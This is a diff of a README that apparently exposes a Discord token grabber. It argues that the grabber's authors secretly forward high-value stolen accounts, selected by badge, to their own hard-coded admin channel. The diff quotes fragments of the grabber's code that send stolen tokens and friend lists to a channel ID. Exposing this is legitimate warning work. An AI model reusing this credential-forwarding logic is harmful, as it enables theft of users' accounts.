ExtraFrisky/Byebye-Bby/README.md

 - ```getTokenInfo(tokens, channelId, ip = undefined, dualHook = false)```

 "Wait, I thought you said it was dual hooked"
-Well, the shit (Early supporter, etc) tokens aren't.
+Well, the shit tokens (Early supporter, etc) aren't.
 But ALL the passwords.txt and cookies.txt are!
 However, if you observe the above code, all they need to change is the "false" to "true", and that's it.
+That. is. it!
+False to True and all your grabbed accouts are belong to us.

 Just look at **Exhibit #3**, this is the juicy shit.

 # Exhibit #3:
-HA SIKE
+Oh my, if "discord_partner", "hypesquad"...
+What next?
+Observe this code.
 ```
 if (badges.includes("discord_partner") || badges.includes("HypeSquad_Event") || badges.includes("Bug_Hunter") || badges.includes("Discord_certified_moderator") || badges.includes("Verified_Bot_Developer")) {
     sendEmbed([embed, (await getHQFriendList(token))], "907326009479667735", true); // Sends the token to admins.
 Look at the "true" at the end.
     return; // Exit the code execution
 }
+sendEmbed([embed, (await getHQFriendList(text.token))], channelId, true);
 ```
+This code looks for all the ULTRA rare accounts.
+And then sends it to a hard coded channel ID `907326009479667735` and `true` = admin.
 Just as a refresher, check the method for sendEmbed()
 ```
-async function sendEmbed(embeds = [], channelId = 0, admin = false)
+async function sendEmbed(embeds = [], >> channelId = 0, admin = false <<) // These >> two parameters << are important, duhhh!
 ```
+If the 2nd parameter is set, it'll hard code a channel to send to.
 If the last parameter is true, it sends it to the admins.

 If you grab any of the following accounts:
 * Discord Partner